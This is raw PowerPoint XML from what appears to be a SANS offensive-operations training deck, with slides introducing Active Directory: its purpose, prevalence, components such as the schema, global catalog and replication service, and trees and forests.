          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OFFENSIVE OPERATIONS RESOURCES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF70291D-95C5-68BB-D5CE-5B302376365A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="111"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716963" y="4844368"/>
            <a:ext cx="4537564" cy="323165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://www.sans.org/offensive-operations/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA2650F3-A640-5F7C-14F4-A18A7CF88B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="112"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6716962" y="5197021"/>
            <a:ext cx="4537567" cy="323165"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@SANSOffensive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{282B098D-1C46-77C4-C201-5E3D4616B143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="122"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Jean-François </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Maes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFD3C310-850A-472E-8A0A-4402E640F587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428624" y="-623211"/>
            <a:ext cx="11334750" cy="623211"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="180000" rIns="0" bIns="108000" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Contacts and Resources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="139876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C693-DF5C-7DB0-6741-2B7EAE3221F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Intro to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="300" noProof="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Active Directory</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AD51BAA-62BD-7D1A-6E80-83A9D024CB8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Most organizations leverage Active Directory (AD) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>AD is a database used to manage Windows networks with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Resources: Computers, Users, Shares </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Security Policies and Central Management: Group Policy </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Access Rules that control relationships between resources: DACLs</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>"Active Directory enables centralized, secure management of an entire network, which might span a building, a city, or multiple locations throughout the world."</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357703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3F1B-9022-6E66-F40C-C87442B1FE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Why Should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="300" dirty="0"/>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>bout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AD?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93FA0854-A93A-D2E3-E9C5-E0C4569C691B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>90-95% of fortune 1000 companies use AD or Azure AD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>SME prefers AD as it reduces technical overhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Facilitates management of their IT infrastructure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Not a lot of suitable alternatives out there</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CDA3B0-2E8B-D193-09F4-65700DA18496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7711782" y="2377349"/>
            <a:ext cx="3954713" cy="3966208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268450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7D3B-2DF0-9DD1-4A30-0BDF95B73B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>omponents </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ound in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" spc="300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>AD?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D396F722-727C-D366-5ADE-357E4EA8F651}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="442863" y="1302789"/>
            <a:ext cx="1339105" cy="1248699"/>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prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B30D66-3A54-5ABF-D98B-D3A2B77BE0FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904597" y="1302789"/>
            <a:ext cx="9843989" cy="1248699"/>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We already indicated that</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> Active Directory</a:t>
            </a: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 is a database containing records for anything in the network ranging from computers to users to group policies. In order for AD to work efficiently, the architecture of AD consists of the following:</a:t>
            </a:r>
            <a:endPar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5" name="Graphic 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FEAAD8-629D-4512-613B-B3A5AC33E7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064" y="1442786"/>
            <a:ext cx="968702" cy="968702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3AC6171-2A0A-B435-6E5E-316857F964CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="428623" y="2714453"/>
            <a:ext cx="1339105" cy="764351"/>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prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3E4CDA-64A1-1CD4-2B03-77FCE1976915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1890356" y="2728258"/>
            <a:ext cx="9843989" cy="764350"/>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rPr>
              <a:t>Schema: </a:t>
            </a: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Contains definitions of every object that can be created in AD</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{434852B4-9550-F036-7C41-43FB2A03824F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="457649" y="3696981"/>
            <a:ext cx="1339105" cy="764351"/>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prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F39A104D-06EB-80AA-AF96-D0EA7B617871}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919383" y="3710785"/>
            <a:ext cx="9843989" cy="764350"/>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rPr>
              <a:t>Indexing and querying:</a:t>
            </a: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 Provides a mean to search specified records in the AD database</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01318C6-7F09-5D98-3746-8394D5FD3795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="457649" y="4651904"/>
            <a:ext cx="1339105" cy="764351"/>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prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60E4C030-68BB-7EFD-2102-6782E89B614D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919383" y="4665708"/>
            <a:ext cx="9843989" cy="764350"/>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rPr>
              <a:t>Global Catalog: </a:t>
            </a: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Contains information about every object in a forest</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57972BD6-352E-05DC-4532-752038CBDB02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="442863" y="5558593"/>
            <a:ext cx="1339105" cy="764351"/>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prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA434A89-7744-E57B-7200-571F5F9A235C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893503" y="5557116"/>
            <a:ext cx="9843989" cy="764350"/>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rPr>
              <a:t>Replication Service: </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The most interesting one for attackers—distributes information across domain controllers</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" b="1" i="0" u="none" strike="noStrike" kern="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14" name="Graphic 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{020B0729-EAF2-130C-9BB0-6D3096DFAF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239" y="2688326"/>
            <a:ext cx="764350" cy="756594"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Graphic 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C4CE4FA-24FE-FB3E-B6A6-D4E7158B34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074" y="3762901"/>
            <a:ext cx="630681" cy="630681"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Graphic 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EEC8094-215B-6608-0B69-D928583BE5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888" y="4674636"/>
            <a:ext cx="717055" cy="717055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1476ACE6-566A-C71E-74FF-E2EFF27815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239" y="5584721"/>
            <a:ext cx="764350" cy="764350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="820106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D246-7BC3-28FE-7029-ED24885685C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Trees &amp; Forests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{104127BF-9E53-2257-FAB9-5C00797CED1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="678198" y="2366519"/>
            <a:ext cx="6169752" cy="3251670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AD6E2E6-3F56-1BFB-E175-6C7B0CFFA18B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="invGray">
          <a:xfrm>
            <a:off x="428624" y="1270272"/>
            <a:ext cx="1337317" cy="1247032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C00000"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter lim="800000"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="135000" rIns="135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prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BBB3E86-834A-E58C-05CC-A927DBBBDE20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1932528" y="1270273"/>
            <a:ext cx="9830846" cy="1247032"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E3E1E1"/>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Microsoft domains are based upon the following core concepts:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214313" marR="0" lvl="0" indent="-21431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black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Trees</a:t>
            </a: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 are collections of related domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="214313" marR="0" lvl="0" indent="-21431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prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
